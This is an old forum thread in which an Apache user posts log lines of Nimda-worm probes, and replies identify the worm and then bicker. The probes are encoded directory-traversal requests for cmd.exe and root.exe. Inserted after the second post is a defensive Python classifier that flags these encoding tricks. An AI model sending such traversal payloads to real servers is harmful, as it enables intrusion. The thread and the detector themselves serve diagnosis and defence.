#1
Hacker probing my system?
I run Apache on my local system (Windows 2000) for development. Lines like this keep appearing in my logs:
207.x.x.x - - [18/Oct/2001:02:58:12 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
207.x.x.x - - [18/Oct/2001:02:58:13 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
207.x.x.x - - [18/Oct/2001:02:58:15 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
207.x.x.x - - [18/Oct/2001:02:58:17 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
207.x.x.x - - [18/Oct/2001:02:58:18 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
207.x.x.x - - [18/Oct/2001:02:58:19 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
207.x.x.x - - [18/Oct/2001:02:58:21 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
207.x.x.x - - [18/Oct/2001:02:58:22 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:24 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:25 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:26 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
207.x.x.x - - [18/Oct/2001:02:58:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
207.x.x.x - - [18/Oct/2001:02:58:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
207.x.x.x - - [18/Oct/2001:02:58:30 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
207.x.x.x - - [18/Oct/2001:02:58:31 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
It seems like something is trying to access these files every two hours or so and it looks like the IP always starts with '207'. What do you think this is: somebody trying to hack my system, Microsoft update or something, ...?
#2
Appears to be the nimda worm scanning systems.
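As an added example (not part of the original thread): a small Python classifier for the kind of requests in the posted log, which decodes each path repeatedly and flags the encoding tricks visible there. It assumes Apache Common Log Format; the function names and flag labels are illustrative, and the last sample line is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
OVERLONG = re.compile(rb'[\xc0\xc1]')   # lead bytes that valid UTF-8 never uses
TARGETS = (b'cmd.exe', b'root.exe')     # executables requested in the posted log

def decode_fully(path, max_rounds=5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = path.encode('utf-8'), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def classify(line):
    """Return (host, status, flags) for one log line, or None if unparsable."""
    m = CLF.match(line.strip())
    if not m:
        return None
    host, path, status = m.groups()
    decoded, rounds = decode_fully(path)
    norm = decoded.replace(b'\\', b'/').lower()
    flags = set()
    if rounds > 1:
        flags.add('multi-encoded')       # e.g. %255c -> %5c -> backslash
    if OVERLONG.search(decoded):
        flags.add('overlong-utf8')       # e.g. %c0%af, %c1%1c
    if b'../' in norm:
        flags.add('traversal')
    if any(t in norm.split(b'?')[0] for t in TARGETS):
        flags.add('shell-target')
    return host, int(status), flags

# Three request lines copied from the post, plus one constructed benign line.
SAMPLE = [
    '207.x.x.x - - [18/Oct/2001:02:58:12 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274',
    '207.x.x.x - - [18/Oct/2001:02:58:17 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298',
    '207.x.x.x - - [18/Oct/2001:02:58:25 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297',
    '192.0.2.10 - - [18/Oct/2001:03:00:00 -0600] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        host, status, flags = classify(entry)
        print(host, status, sorted(flags) or 'clean')
```

The status field matters as much as the flags: every flagged request in the post was answered with 404 or 400, so the server returned nothing for them.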
#3
You need to stay alert to what's going on on the net. This thingy has been spreading all over for months. If you are the type of person who doesn't know how to run a server, just don't run it. IIS or Apache doesn't make any difference.
#4
Months huh? From what I've read so far (yes I'm getting on top of this one) it appeared last month. You also appear to be wrong that it doesn't matter what type of server you run - nimda attempts to take advantage of vulnerabilities in IIS. Apache seems to be immune.
#5
I was referring to your bad practice, not Nimda.
#6
So you're totally up to date and in the know on *all* viruses, worms, etc.? I heard about nimda when it first came out, took the necessary precautions, and forgot about it. Turns out I still don't have to worry about it, except for some extra traffic whose signature I hadn't memorized.
#7
>> So you're totally up to date and in the know on *all* viruses, worms, etc.?
I can't say I am up to the minute. At the very least I do surf a dozen bugtraq sites and mailing lists daily.
>> I heard about nimda when it first came out
Nimda has been out for a while and it's not something new. If you claim to know about it, why post such a message with a subject of "Hacker probing my system?" in the first place?
#8
>>whose signature I hadn't memorized.<<
Viewing: Dev Shed Forums > System Administration > Apache Development > Hacker probing my system?